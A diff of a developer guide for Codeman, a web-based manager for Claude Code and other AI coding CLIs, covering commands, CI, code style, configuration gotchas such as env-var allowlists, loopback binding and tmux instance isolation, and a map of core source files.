**Tech Stack**: TypeScript (ES2022/NodeNext, strict mode), Node.js, Fastify, node-pty, xterm.js. Supports Claude Code, OpenCode, Codex (OpenAI), Gemini (Google, enterprise-only since Google's June 2026 consumer cutover), and Antigravity (`agy`, Google) CLIs via pluggable CLI resolvers (`SessionMode = 'claude' | 'shell' | 'opencode' | 'codex' | 'gemini' | 'antigravity'`).
|
||||
|
||||
**TypeScript Strictness** (see `tsconfig.json`): `noUnusedLocals`, `noUnusedParameters`, `noImplicitReturns`, `noImplicitOverride`, `noFallthroughCasesInSwitch`, `allowUnreachableCode: false`, `allowUnusedLabels: false`.
|
||||
|
||||
@@ -74,41 +92,48 @@ Codeman is a Claude Code session manager with web interface and autonomous Ralph
|
||||
|
||||
`npm run dev` = dev server. Default port: `3000` (override with `--port` or the `CODEMAN_PORT` env var). To run this beta isolated alongside a prod Codeman, use `scripts/run-beta.sh` (sets `CODEMAN_INSTANCE=beta` + `CODEMAN_PORT=5000`). Commands not in Quick Reference:
|
||||
|
||||
| Task | Command |
|
||||
|------|---------|
|
||||
| Dev with TLS | `npx tsx src/index.ts web --https` |
|
||||
| Override window title hostname | `npx tsx src/index.ts web --title-hostname <name>` (default: `os.hostname()` — `codeman:<name>` is used for tab title, title-flash, and OS desktop notification prefix) |
|
||||
| Bind a non-loopback host | `npx tsx src/index.ts web --host 0.0.0.0` (or `-H`; env `CODEMAN_HOST`; default `127.0.0.1`). Without `CODEMAN_PASSWORD` it **starts but warns loudly** — see Common Gotchas + `docs/security-architecture.md` |
|
||||
| Continuous typecheck | `tsc --noEmit --watch` |
|
||||
| Test coverage | `npm run test:coverage` |
|
||||
| Dead-code sweep | `npm run knip` (config in `knip.json`) |
|
||||
| Rebuild gesture overlay | `npm run build:gesture` (esbuild `packages/gesture-control/src/codeman/entry.ts` → `src/web/public/gesture/gesture-codeman.js`; commit the result) |
|
||||
| Gesture playground | `npm run dev` **in** `packages/gesture-control/` (standalone vite demo, fake tabs) |
|
||||
| Check public-asset formatting | `npm run check:public-assets` (prettier-checks `src/web/public/**` text assets; `scripts/check-public-assets.mjs`) |
|
||||
| Frontend JS syntax check | `npm run check:frontend-syntax` (`scripts/check-frontend-syntax.mjs`; runs in CI) |
|
||||
| CI-equivalent test sweep | `npm run test:ci` (full suite minus browser/perf — see Testing) |
|
||||
| Production start | `npm run start` |
|
||||
| Production logs | `journalctl --user -u codeman-web -f` |
|
||||
| Task | Command |
|
||||
| ------------------------------ | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| Dev with TLS | `npx tsx src/index.ts web --https` |
|
||||
| Override window title hostname | `npx tsx src/index.ts web --title-hostname <name>` (default: `os.hostname()` — `codeman:<name>` is used for tab title, title-flash, and OS desktop notification prefix) |
|
||||
| Bind a non-loopback host | `npx tsx src/index.ts web --host 0.0.0.0` (or `-H`; env `CODEMAN_HOST`; default `127.0.0.1`). Without `CODEMAN_PASSWORD` it **starts but warns loudly** — see Common Gotchas + `docs/security-architecture.md` |
|
||||
| Continuous typecheck | `tsc --noEmit --watch` |
|
||||
| Watch-mode test | `npm run test:watch -- test/<file>.test.ts` (always pass a file — bare watch includes the browser suites) |
|
||||
| Test coverage | `npm run test:coverage` |
|
||||
| Dead-code sweep | `npm run knip` (config in `config/knip.json`, passed via `--config`) |
|
||||
| Rebuild gesture overlay | `npm run build:gesture` (esbuild `packages/gesture-control/src/codeman/entry.ts` → `src/web/public/gesture/gesture-codeman.js`; commit the result) |
|
||||
| Build the docker agent image | `node scripts/build-agent-image.mjs --no-cache` (builds `codeman/agent:base` from `docker/agent.Dockerfile`; prerequisite for Docker cases; `--engine`/`--image`). ⚠ **Always `--no-cache`** — a plain rebuild re-uses the cached `npm install -g` layer and silently keeps the CLIs frozen at their original versions, which once shipped a BROKEN codex while reporting success. See `docs/docker-cases.md` |
|
||||
| Gesture playground | `npm run dev` **in** `packages/gesture-control/` (standalone vite demo, fake tabs) |
|
||||
| Check public-asset formatting | `npm run check:public-assets` (prettier-checks `src/web/public/**` text assets; `scripts/check-public-assets.mjs`) |
|
||||
| Frontend JS syntax check | `npm run check:frontend-syntax` (`scripts/check-frontend-syntax.mjs`; runs in CI) |
|
||||
| CI-equivalent test sweep | `npm run test:ci` (full suite minus browser/perf — see Testing) |
|
||||
| Production start | `npm run start` |
|
||||
| Production logs | `journalctl --user -u codeman-web -f` |
|
||||
| Detached server | `codeman web -d` (`--status`, `--stop`; pidfile+log at `dataPath('web.pid'/'web.log')`). ⚠ Refuses to start a 2nd server on one data dir — see Instance isolation |
|
||||
| Install/remove the service | `codeman service install` / `status` / `uninstall` (systemd user unit on Linux, LaunchAgent on macOS; names from `config/service-names.ts`) |
|
||||
|
||||
**CI**: `.github/workflows/ci.yml` (push to master/main + PRs, Node 22) runs two jobs: **(1)** `check:lockfile`, `typecheck`, `lint`, `check:frontend-syntax`, `format:check`, then a **server boot smoke test** (`tsx src/index.ts web --port 3151` must answer `/api/status` within 30s); **(2)** the **unit/integration test suite** via `npm run test:ci` (`config/vitest.ci.config.ts` — excludes the browser-driven `test/mobile/**` suite, `perf-*` benchmarks, and 3 Playwright tests). Tests are tmux-safe in CI: `TmuxManager` no-ops all shell commands under `VITEST` (see Testing).
|
||||
|
||||
**Code style**: Prettier (`singleQuote: true`, `printWidth: 120`, `trailingComma: "es5"`). ESLint flat config (`config/eslint.config.js`) allows `no-console`, warns on `@typescript-eslint/no-explicit-any`. Ignores: `app.js`, `scripts/**/*.mjs`, `src/web/public/vendor/**`, `scripts/remotion/**`.
|
||||
**Code style**: Prettier (`singleQuote: true`, `printWidth: 120`, `trailingComma: "es5"`) — config lives in the **`"prettier"` key of `package.json`**, not a `.prettierrc` (keeps the repo root short; editors read it natively). `.prettierignore` stays at the root because Prettier resolves it relative to cwd. ESLint flat config (`config/eslint.config.js`) allows `no-console`, warns on `@typescript-eslint/no-explicit-any`. Ignores: `app.js`, `scripts/**/*.mjs`, `src/web/public/vendor/**`, `scripts/remotion/**`.
|
||||
|
||||
**Prettier scope is deliberately narrow.** `npm run format` globs only `src/**/*.ts` and `src/web/public/**`, and `.prettierignore` then exempts most of `src/web/public/*.js` (app.js, styles.css, index.html, and 14 hand-formatted modules) plus `CLAUDE.md`. Those files are hand-formatted by design; `npm run check:public-assets` and `check:frontend-syntax` are what guard them (NUL bytes + JS syntax), not Prettier. Do not "fix" a file by adding it back to Prettier's scope.
|
||||
|
||||
## Common Gotchas
|
||||
|
||||
- **Single-line prompts only** — `writeViaMux()` sends text+Enter separately; multi-line breaks Ink
|
||||
- **Single-line prompts only** — `writeViaMux()` sends text+Enter separately; multi-line breaks Ink. ⚠️ **Input must END with `\r` or Enter is never sent**: `sendInput()` only issues `send-keys Enter` when the payload contains a carriage return, a `\r`-less `POST /api/sessions/:id/input` still succeeds (send-and-wait even reports `delivered:true`) while the text sits unsubmitted on the composer, and any `wait` burns its whole timeout on a turn that never started. Embedded newlines are stripped, not rejected, so `"echo A\necho B\r"` runs the joined `echo Aecho B`
|
||||
- **ESM only** — Never `require()`, use `await import()`. `tsx` masks CJS/ESM issues in dev but production breaks
|
||||
- **Package ≠ product name** — npm: `aicodeman`, product: **Codeman**. Release renames tags accordingly. Both `aicodeman` and `codeman` bin aliases are installed (`package.json` `bin`)
|
||||
- **Global regex `lastIndex`** — Shared `g`-flag patterns in loops must reset `lastIndex = 0` first, or use the `execPattern()` helper in `utils/regex-patterns.ts` (resets automatically)
|
||||
- **`envOverrides` flow `CLAUDE_CODE_*` / `OPENCODE_*` / `CODEX_*` env vars** — Set via `POST /api/sessions { envOverrides }`, stored on `Session._envOverrides`, exported by `tmux-manager.buildEnvExports()` at spawn time, persisted in `SessionState.envOverrides`. **Do NOT** write these to `<case>/.claude/settings.local.json` — that's the old path and creates UI/disk drift
|
||||
- **`envOverrides` flow `CLAUDE_CODE_*` / `OPENCODE_*` / `CODEX_*` / `GEMINI_*` / `GOOGLE_*` / `ANTIGRAVITY_*` env vars, plus exact-key `CLAUDE_CONFIG_DIR`** — Set via `POST /api/sessions { envOverrides }`, stored on `Session._envOverrides`, exported by `tmux-manager.buildEnvExports()` at spawn time, persisted in `SessionState.envOverrides`. **Do NOT** write these to `<case>/.claude/settings.local.json` — that's the old path and creates UI/disk drift. (`GOOGLE_*` is the deliberately-broad Vertex-AI namespace for Gemini — see Multi-CLI prefix discipline.) `CLAUDE_CONFIG_DIR` (#255, exact match via `ALLOWED_ENV_KEYS` in `schemas.ts`) points a session at a separate Claude account/config dir for per-client subscriptions; it persists to state.json (a path, not a secret; losing it on restart would silently switch accounts). ⚠️ A relocated config dir writes transcripts outside `~/.claude/projects`, so the response viewer, subagent windows, ultracode panel and Read My Mind capture go blind for that session unless the user symlinks `projects` back into the shared tree (`ln -s ~/.claude/projects <configDir>/projects`). → [architecture-invariants#per-session-env-overrides-exact-key-allowlist-and-claude_config_dir](docs/architecture-invariants.md#per-session-env-overrides-exact-key-allowlist-and-claude_config_dir)
|
||||
- **Effort is NOT an env var** — never carry effort as `CLAUDE_CODE_EFFORT_LEVEL`: the env var hard-locks effort and blocks in-session `/effort` switching (incl. ultracode). It flows as the dedicated `effort` payload field → `Session._effort` → `claude --effort <level>` for regular levels incl. `max` (the settings `effortLevel` key is `enum(["low","medium","high","xhigh"]).catch(undefined)` — `max` gets SILENTLY dropped there), or `claude --settings '{"ultracode":true}'` for ultracode (rejected by `--effort`). Both are soft defaults the user can override anytime. Legacy env-var entries are auto-migrated by the Session constructor and unset from tmux sessions in `applyEnvOverrides()`. See `buildEffortCliArgs()` in `session-cli-builder.ts`, tests in `test/effort-injection.test.ts`
|
||||
- **Model choice flows via `settings.local.json`, NOT `--model` or env** — the App Settings **Claude Model** picker (`claudeModel` in `settings.json`) is read by `session-ui.js` at session create (wins over the legacy 1M-Opus toggles `opusContext1m`/`opusContext1mEnabled`), sent as the `modelOverride` payload field, and `updateCaseModel()` (`hooks-config.ts`) writes/deletes the `model` key in `<case>/.claude/settings.local.json`. This is the intended exception to the envOverrides rule above: model legitimately lives in `settings.local.json` (a soft default — in-session `/model` still works); env vars do not
|
||||
- **Multi-CLI prefix discipline** — Codeman supports Claude Code, OpenCode, and Codex (`claude-cli-resolver.ts` / `opencode-cli-resolver.ts` / `codex-cli-resolver.ts`); env-var prefix is CLI-specific (`CLAUDE_CODE_*` vs `OPENCODE_*` vs `CODEX_*`) and the allowlist in `schemas.ts` enforces this. When adding settings, decide which CLI(s) it applies to and gate the env export accordingly — don't blindly forward all prefixes. See `docs/opencode-integration.md` for the OpenCode resolver design
|
||||
- **Zod `.optional()` rejects `null`** — accepts `undefined` only. When the frontend builds a request body with `JSON.stringify`, an explicit `null` field is preserved on the wire and fails validation with `INVALID_INPUT`. Convert `null` → `undefined` before stringifying (e.g. `field: value ?? undefined`), or declare the schema `.nullish()`. Real bugs caused: 0.6.4 (`durationMinutes` for ∞ respawn), and the same shape pattern hit `opusContext1mEnabled` in 0.6.3
|
||||
- **`xterm-zerolag-input` is single-source — edit the package, then rebuild the bundle** — the local-echo overlay source lives ONLY in `packages/xterm-zerolag-input/src/` (`zerolag-input-addon.ts`; also published to npm as a standalone library — see README "Published Packages"). It is bundled (esbuild → IIFE, with appended `window.LocalEchoOverlay` aliases) into the **gitignored** `src/web/public/vendor/xterm-zerolag-input.js` by `scripts/postinstall.js` (for dev/`tsx`) and into `dist/.../vendor/` by `scripts/build.mjs:50` (for prod). `app.js` only **consumes** it via `new LocalEchoOverlay(terminal)` — there is NO inline copy to keep in sync. So: change behavior in the package source, then re-run the bundle step (`npm install` reruns postinstall; `npm run build` for prod); **never hand-edit `app.js` for overlay behavior or commit the gitignored vendor bundle**. A public-API break in the package still warrants a separate `xterm-zerolag-input` version bump in the changeset. Always test on mobile after touching it. See `docs/local-echo-overlay-plan.md`.
|
||||
- **Default bind is loopback-only; non-loopback without a password starts but warns** — since COD-29 (PR #107) the web server defaults to `--host 127.0.0.1` (was `0.0.0.0`). As of **0.9.0** binding a non-loopback host (`--host`/`-H`/`CODEMAN_HOST`) without `CODEMAN_PASSWORD` **no longer refuses to start — it starts and prints a loud warning** listing the fixes (set `CODEMAN_PASSWORD`, bind loopback + tunnel/`tailscale serve`, or `--allow-unauthenticated-network` / `CODEMAN_ALLOW_UNAUTHENTICATED_NETWORK=1` to acknowledge → terser note). Host classification is `isLoopbackBindHost()` in `network-auth-policy.ts`; the warn-vs-start logic is in `server.ts` `start()`; flags wired in `cli.ts`. ⚠️ Operational note: the production systemd unit runs `node dist/index.js web --https` with no `--host`, so it binds **localhost only** — reach it remotely via `tailscale serve`/tunnel to `127.0.0.1`, or add `Environment=CODEMAN_HOST=0.0.0.0` + `Environment=CODEMAN_PASSWORD=…` to `~/.config/systemd/user/codeman-web.service`. A loopback bind is reachable through a same-host tunnel (cloudflared/tailscale → `127.0.0.1`) but NOT by a browser hitting the box's LAN IP. Auth user defaults to `admin`. **Full model: `docs/security-architecture.md`.**
|
||||
- **Instance isolation / multi-instance attach danger** — data dir (`~/.codeman`) and tmux socket (`tmux -L codeman`) are PROCESS-WIDE and shared by every Codeman on the machine, derived from `CODEMAN_INSTANCE` via `src/config/instance.ts` (`getDataDir()`/`dataPath()`/`DEFAULT_TMUX_SOCKET`). ⚠️ A 2nd instance on the SAME socket **discovers and attaches PTYs to the first instance's live sessions** (`tmux -L codeman attach-session …`), resizing/mutating them — `$HOME` isolation is NOT enough (tmux is system-global). To run two instances, give each a distinct `CODEMAN_INSTANCE` (scopes BOTH dir+socket: `~/.codeman-<name>` + `-L codeman-<name>`), or set `CODEMAN_TMUX_SOCKET` + `CODEMAN_DATA_DIR` individually. **`CODEMAN_INSTANCE` defaults to empty = the production layout (`~/.codeman`, `-L codeman`, port 3000)**, so this branch is safe to ship to master without disturbing existing installs. To run THIS beta alongside prod, launch with `scripts/run-beta.sh` (`CODEMAN_INSTANCE=beta` + `CODEMAN_PORT=5000`) — it never collides with prod's data dir/socket/port. Any new `~/.codeman/...` path MUST go through `dataPath()`, never `join(homedir(), '.codeman', …)`.
|
||||
- **Headless screenshots: `deviceScaleFactor` MUST be 1, and write unique filenames** — `scripts/capture-real-overview.mjs` (drives a live session in headless Chromium → overview PNG). Two traps, both observed 2026-06-14: **(1) DSF=2 doubles the console font.** xterm's WebGL renderer draws terminal glyphs at ~2× their nominal size under `deviceScaleFactor: 2`, while STILL reporting nominal cell dims (`terminal.cols`/`_renderService.dimensions.css.cell` say 8px/187cols — they lie), so it's invisible to any internal measurement and only the pixels reveal it. The HTML chrome (header/toolbar) is unaffected → ONLY the console font looks comically large. Default to **DSF=1** (script does); the image is 1× res but the font is true-to-browser. **(2) Stable filenames → stale renders.** Overwriting a fixed path (`claude-overview.png`) in place leaves OS image viewers (eog/feh) — and any HTTP client behind a long/`immutable` cache — showing the OLD render; the user reads it as "the fix didn't work". The script now mints a timestamped `claude-overview-<ts>.png` per run. ⚠️ This was a LOCAL image-viewer cache, NOT a Codeman serving bug: `file-routes` previews send `Cache-Control: no-cache` and `/api/screenshots/:name` sends none. The one real Codeman-side footgun: `server.ts` serves non-content-hashed static assets `public, max-age=31536000, immutable`, and `cacheBustAssets()` only rewrites `.js`/`.css` refs — a stable-named **image** referenced from public/ would go stale on overwrite. Reflect the per-device UI to match a real device when capturing: seed `localStorage` `codeman:skin`, `codeman-font-size`, and the desktop `codeman-app-settings` blob (the plan-usage chip is a per-device display key deleted from the server payload — a fresh browser hides it unless seeded; close side panels for a full-width terminal).
|
||||
- **Multi-CLI prefix discipline** — env-var prefix is CLI-specific (`CLAUDE_CODE_*` vs `OPENCODE_*` vs `CODEX_*` vs `GEMINI_*` vs `ANTIGRAVITY_*`) and the `ALLOWED_ENV_PREFIXES` allowlist in `schemas.ts` enforces this; non-prefix exceptions are exact keys in `ALLOWED_ENV_KEYS` (currently only `CLAUDE_CONFIG_DIR`), never a widened prefix. Gemini additionally allowlists the **broad `GOOGLE_*`** namespace (intentional: Vertex AI auth needs `GOOGLE_CLOUD_PROJECT`/`GOOGLE_APPLICATION_CREDENTIALS`/`GOOGLE_GENAI_USE_VERTEXAI`; it is the loosest allowlist entry, affecting only the user's own spawned CLI). When adding a setting, decide which CLI(s) it applies to and gate the env export accordingly. Never blanket-forward all prefixes. Resolver design pattern: `docs/opencode-integration.md`
|
||||
- **Zod `.optional()` rejects `null`** — accepts `undefined` only. When the frontend builds a request body with `JSON.stringify`, an explicit `null` field is preserved on the wire and fails validation with `INVALID_INPUT`. Convert `null` → `undefined` before stringifying (e.g. `field: value ?? undefined`), or declare the schema `.nullish()`. This has caused real shipped bugs twice
|
||||
- **`xterm-zerolag-input` is single-source** — BOTH echo addons live ONLY in `packages/xterm-zerolag-input/src/`, bundled into TWO **gitignored** vendor files: `vendor/xterm-zerolag-input.js` (buffer overlay, entry `zerolag-input-addon.ts`) and `vendor/xterm-predictive-echo.js` (codex write-through, entry `predictive-echo-addon.ts`) — dev by `scripts/postinstall.js`, prod by `scripts/build.mjs`. `app.js`/terminal-ui.js only **consume** them via `new LocalEchoOverlay(terminal)` / `new PredictiveEchoOverlay(terminal)`; there is no inline copy. So: change the package source, then rerun the bundle step (`npm install` for dev, `npm run build` for prod). **Never hand-edit `app.js` for overlay behavior, and never commit the gitignored vendor bundles.** Always test on mobile after touching it. → [architecture-invariants#xterm-zerolag-input-is-single-source](docs/architecture-invariants.md#xterm-zerolag-input-is-single-source), `docs/local-echo-overlay-plan.md`
|
||||
- **Default bind is loopback-only; non-loopback without a password starts but warns** — the server defaults to `--host 127.0.0.1`. Binding non-loopback (`--host`/`-H`/`CODEMAN_HOST`) without `CODEMAN_PASSWORD` starts anyway but prints a loud warning; `--allow-unauthenticated-network` / `CODEMAN_ALLOW_UNAUTHENTICATED_NETWORK=1` acknowledges it. ⚠️ The production systemd unit passes no `--host`, so prod binds **localhost only**: reach it via `tailscale serve`/tunnel to `127.0.0.1`. A loopback bind is reachable through a same-host tunnel but NOT by a browser hitting the box's LAN IP. `install.sh` is separate and prompts for the binding (defaulting to LAN + a password), and preserves the existing binding on re-runs. → [architecture-invariants#default-bind-and-the-non-loopback-warning-path](docs/architecture-invariants.md#default-bind-and-the-non-loopback-warning-path), `docs/security-architecture.md`
|
||||
- **Instance isolation / multi-instance attach danger** — the data dir (`~/.codeman`) and tmux socket (`tmux -L codeman`) are PROCESS-WIDE and shared by every Codeman on the machine, derived from `CODEMAN_INSTANCE` via `src/config/instance.ts`. ⚠️ A 2nd instance on the SAME socket **discovers and attaches PTYs to the first instance's live sessions**, resizing and mutating them. `$HOME` isolation is NOT enough because tmux is system-global. To run two instances, give each a distinct `CODEMAN_INSTANCE` (scopes dir + socket together), or set `CODEMAN_TMUX_SOCKET` + `CODEMAN_DATA_DIR` individually; `scripts/run-beta.sh` does this for a beta alongside prod. **Any new `~/.codeman/...` path MUST go through `dataPath()`**, never `join(homedir(), '.codeman', …)`. → [architecture-invariants#instance-isolation-and-the-multi-instance-attach-danger](docs/architecture-invariants.md#instance-isolation-and-the-multi-instance-attach-danger)
|
||||
- **node-pty's macOS `spawn-helper` ships without `+x`** (issues #6, #204): `node-pty@1.1.0` publishes `prebuilds/darwin-<arch>/spawn-helper` as mode 0644, and macOS launches every PTY through it, so a stock macOS install fails every session start with `Error: posix_spawnp failed.` **Linux can never reproduce it**: `spawn-helper` is an `OS=="mac"` gyp target and node-pty ships no Linux prebuild, so node-gyp always emits an executable helper there. ⚠️ Look in **`prebuilds/<platform>-<arch>/`**, not just `build/Release/`, which does not exist on macOS. Repair is a chmod, never a mandatory rebuild (that would require Xcode CLI tools and deletes `prebuilds/` before compiling): `npm run fix:node-pty` chmods every helper then proves it by really opening a PTY. `spawnPtyWithHelperRepair()` (`utils/node-pty-repair.ts`) wraps every `pty.spawn()` in `session.ts` and self-heals a broken install on the first failure. → [architecture-invariants#node-ptys-macos-spawn-helper-must-be-executable](docs/architecture-invariants.md#node-ptys-macos-spawn-helper-must-be-executable)
|
||||
- **Headless screenshots: `deviceScaleFactor` MUST be 1, and write unique filenames** — under DSF=2 xterm's WebGL renderer draws glyphs at ~2× nominal size while still *reporting* nominal cell dims, so only the pixels reveal it and only the terminal font looks wrong. And overwriting a fixed output path leaves OS image viewers showing the old render, which reads as "the fix didn't work"; `scripts/capture-real-overview.mjs` mints a timestamped filename per run. Seed the per-device `localStorage` keys (`codeman:skin`, `codeman-font-size`, `codeman-app-settings`) so the capture matches a real device. → [architecture-invariants#headless-screenshot-capture](docs/architecture-invariants.md#headless-screenshot-capture)
|
||||
|
||||
**Import conventions**: Utils from `./utils`, types from `./types` (barrel), config from specific `./config/*` files.
|
||||
|
||||
@@ -116,32 +141,35 @@ Codeman is a Claude Code session manager with web interface and autonomous Ralph
|
||||
|
||||
### Core Files (by domain)
|
||||
|
||||
| Domain | Key files | Notes |
|
||||
|--------|-----------|-------|
|
||||
| **Entry** | `src/index.ts`, `src/cli.ts` | |
|
||||
| **Session** | `src/session.ts` ★, `src/session-manager.ts`, `src/session-auto-ops.ts`, `src/session-cli-builder.ts`, `src/session-lifecycle-log.ts`, `src/session-task-cache.ts`, `src/usage-limit-patterns.ts`, `src/usage-telemetry.ts` | |
|
||||
| **Mux** | `src/mux-interface.ts`, `src/mux-factory.ts`, `src/tmux-manager.ts` ★ | |
|
||||
| **Respawn** | `src/respawn-controller.ts` ★ + 4 helpers (`-adaptive-timing`, `-health`, `-metrics`, `-patterns`) | Read `docs/respawn-state-machine.md` first |
|
||||
| **Ralph** | `src/ralph-tracker.ts` ★, `src/ralph-loop.ts` + 5 helpers (`-config`, `-fix-plan-watcher`, `-plan-tracker`, `-stall-detector`, `-status-parser`) | Read `docs/ralph-wiggum-guide.md` first |
|
||||
| **Orchestrator** | `src/orchestrator-loop.ts`, `src/orchestrator-planner.ts`, `src/orchestrator-verifier.ts` | Read `docs/orchestrator-loop-architecture.md` first |
|
||||
| **Agents** | `src/subagent-watcher.ts` ★, `src/team-watcher.ts`, `src/bash-tool-parser.ts`, `src/transcript-watcher.ts` | |
|
||||
| **AI** | `src/ai-checker-base.ts`, `src/ai-idle-checker.ts`, `src/ai-plan-checker.ts` | |
|
||||
| **Tasks** | `src/task.ts`, `src/task-queue.ts`, `src/task-tracker.ts` | |
|
||||
| **State** | `src/state-store.ts`, `src/run-summary.ts`, `src/session-lifecycle-log.ts` | |
|
||||
| **Infra** | `src/hooks-config.ts`, `src/push-store.ts`, `src/tunnel-manager.ts`, `src/image-watcher.ts`, `src/file-stream-manager.ts` | |
|
||||
| **Attachments** | `src/attachment-registry.ts`, `src/attachment-magic.ts`, `src/session-attachment-history.ts`, `src/document-preview-cache.ts`, `src/document-thumbnailer.ts`, `src/document-conversion-limiter.ts`, `src/config/attachment-guard.ts` | See Key Patterns |
|
||||
| **Plan** | `src/plan-orchestrator.ts`, `src/prompts/*.ts`, `src/templates/` (`claude-md.ts` + `case-template.md`, the CLAUDE.md scaffold generated into new cases) | |
|
||||
| **Web** | `src/web/server.ts` ★, `src/web/sse-events.ts`, `src/web/routes/*.ts` (16 route modules + barrel; `session-routes.ts` ★), `src/web/route-helpers.ts`, `src/web/ports/*.ts`, `src/web/middleware/auth.ts`, `src/web/schemas.ts`, `src/web/self-update.ts`, `src/web/plan-usage-latest.ts` | |
|
||||
| **Frontend** | `src/web/public/app.js` (~3.9K lines, core) + 6 infra modules (`constants.js`, `mobile-handlers.js`, `voice-input.js`, `notification-manager.js`, `keyboard-accessory.js`, `sanitize-html.js` — DOMPurify mXSS allowlist, COD-56) + 7 domain modules (`terminal-ui.js`, `respawn-ui.js`, `ralph-panel.js`, `orchestrator-panel.js`, `settings-ui.js`, `panels-ui.js`, `session-ui.js`) + 5 feature modules (`ralph-wizard.js`, `api-client.js`, `subagent-windows.js`, `input-cjk.js`, `image-input.js`) + `sw.js` | |
|
||||
| **Types** | `src/types/index.ts` (barrel) → 15 domain files; also `src/types.ts` root re-export | See `@fileoverview` in index.ts |
|
||||
| Domain | Key files | Notes |
|
||||
| ---------------- | -------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------- |
|
||||
| **Entry** | `src/index.ts`, `src/cli.ts`, `daemon-control`, `service-installer`, `config/service-names` | The last three back `web -d` / `service install` |
|
||||
| **Session** | `src/session.ts` ★, `session-manager`, `session-auto-ops`, `session-cli-builder`, `session-task-cache`, `session-order` (pure), `session-pty-exit-breaker`, `usage-limit-patterns`, `usage-telemetry`; `src/services/unified-session-service.ts` | Pure/unit-tested helpers are split out of `session.ts` on purpose |
|
||||
| **Mux** | `src/mux-interface.ts`, `src/mux-factory.ts`, `src/tmux-manager.ts` ★ | |
|
||||
| **Respawn** | `src/respawn-controller.ts` ★ + 4 helpers (`-adaptive-timing`, `-health`, `-metrics`, `-patterns`) | Read `docs/respawn-state-machine.md` first |
|
||||
| **Ralph** | `src/ralph-tracker.ts` ★, `src/ralph-loop.ts` + 5 helpers (`-config`, `-fix-plan-watcher`, `-plan-tracker`, `-stall-detector`, `-status-parser`) | Read `docs/ralph-wiggum-guide.md` first |
|
||||
| **Orchestrator** | `src/orchestrator-loop.ts`, `-planner`, `-verifier` | Read `docs/orchestrator-loop-architecture.md` first |
|
||||
| **Cron** | `src/cron/cron-service.ts`, `cron-time.ts` (pure next-run math), `cron-input.ts` | Read `docs/cron-discovery.md` first. Distinct from legacy `ScheduledRun` (`/api/scheduled`) |
|
||||
| **Agents** | `src/subagent-watcher.ts` ★, `team-watcher`, `bash-tool-parser`, `transcript-watcher`, `workflow-run-watcher` | `workflow-run-watcher` is STANDALONE and never touches `subagent-watcher` |
|
||||
| **AI** | `src/ai-checker-base.ts`, `ai-idle-checker.ts`, `ai-plan-checker.ts` | |
|
||||
| **Tasks** | `src/task.ts`, `task-queue.ts`, `task-tracker.ts` | |
|
||||
| **State** | `src/state-store.ts`, `run-summary.ts`, `session-lifecycle-log.ts`, `intent-store.ts` | |
|
||||
| **Infra** | `src/hooks-config.ts`, `push-store`, `tunnel-manager`, `image-watcher`, `file-stream-manager`, `remote-hosts` + `remote-reconnect` (pure), `docker-hosts` + `docker-export` | Remote/docker case overlays; see Key Patterns |
|
||||
| **Web tabs** | `src/webview-store.ts`, `webview-capabilities.ts`, `src/web/webview-proxy.ts` (pure), `src/web/routes/webview-routes.ts` | Dashboard URLs as tabs; NOT a SessionMode |
|
||||
| **Search** | `src/search-service.ts` | Pure in-memory core for `GET /api/search` |
|
||||
| **Attachments** | `src/attachment-registry.ts`, `attachment-magic`, `generated-artifact-attachments`, `session-attachment-history`, `document-preview-cache`, `document-thumbnailer`, `document-conversion-limiter`, `config/attachment-guard` | See Key Patterns |
|
||||
| **Plan** | `src/plan-orchestrator.ts`, `src/prompts/*.ts`, `src/templates/` (`claude-md.ts` + `case-template.md`) | `templates/` holds the CLAUDE.md scaffold generated into new cases |
|
||||
| **Web** | `src/web/server.ts` ★, `sse-events.ts`, `routes/*.ts` (24 modules + barrel; `session-routes.ts` ★), `route-helpers.ts`, `ports/*.ts`, `middleware/auth.ts`, `schemas.ts`, `self-update.ts`, `plan-usage-latest.ts`, `ws-connection-registry.ts`, `heic-jpeg-converter.ts` + `heic-jpeg-worker.ts` | |
|
||||
| **Frontend** | `src/web/public/app.js` (~5K lines, core) + 29 modules + `sw.js` | See Frontend section for the load order, which is authoritative |
|
||||
| **Types** | `src/types/index.ts` (barrel) → 22 domain files; also `src/types.ts` root re-export | See `@fileoverview` in index.ts |
|
||||
|
||||
★ = Large, central file (>50KB) — read its `@fileoverview` first. All files have `@fileoverview` JSDoc — read that before diving in. Discovery aid: `grep -l '@fileoverview' src/web/routes/*.ts` lists all route modules; same grep works for `src/types/`, `src/web/public/*.js`.
|
||||
|
||||
**Local packages**: `packages/xterm-zerolag-input/` — local echo overlay for xterm.js; single-source, bundled to the gitignored `vendor/xterm-zerolag-input.js` and consumed by `app.js` (see Gotchas). `packages/gesture-control/` (`codeman-gesture-control`) — hand-tracking overlay source; built to `src/web/public/gesture/gesture-codeman.js` via `npm run build:gesture` (see Frontend → Gesture control).
|
||||
**Local packages**: `packages/xterm-zerolag-input/` (local echo overlay, single-source, see Gotchas). `packages/gesture-control/` (`codeman-gesture-control`, hand-tracking overlay source, built via `npm run build:gesture`).
|
||||
|
||||
**Config**: `src/config/` — 12 files, no barrel (`index.ts`) exists; import from the specific file.
|
||||
**Config**: `src/config/` — 20 files, no barrel (`index.ts`) exists; import from the specific file.
|
||||
|
||||
**Utilities**: `src/utils/` — re-exported via index. Key: `CleanupManager`, `LRUMap`, `StaleExpirationMap`, `BufferAccumulator`, `stripAnsi`, `Debouncer`, `KeyedDebouncer`. Also: `claude-cli-resolver`/`opencode-cli-resolver`/`codex-cli-resolver` (CLI path resolution), `string-similarity` (fuzzy matching), `regex-patterns` (ANSI/token/spinner patterns), `assertNever` (exhaustive checks), `token-validation` (auth tokens), `nice-wrapper` (process priority).
|
||||
**Utilities**: `src/utils/` — re-exported via index. Key: `CleanupManager`, `LRUMap` (⚠ NOT in the barrel — import from `./utils/lru-map.js` directly), `StaleExpirationMap`, `BufferAccumulator`, `stripAnsi`, `Debouncer`, `KeyedDebouncer`. Also: `claude-cli-resolver`/`opencode-cli-resolver`/`codex-cli-resolver`/`gemini-cli-resolver` (CLI path resolution), `string-similarity` (fuzzy matching), `regex-patterns` (ANSI/token/spinner patterns), `assertNever` (exhaustive checks), `token-validation` (auth tokens), `nice-wrapper` (process priority).
|
||||
|
||||
### Data Flow
|
||||
|
||||
@@ -152,75 +180,149 @@ Codeman is a Claude Code session manager with web interface and autonomous Ralph
|
||||
|
||||
### Key Patterns
|
||||
|
||||
**Input**: `session.writeViaMux()` for programmatic input — tmux `send-keys -l` (literal) + `send-keys Enter`. Single-line only.
|
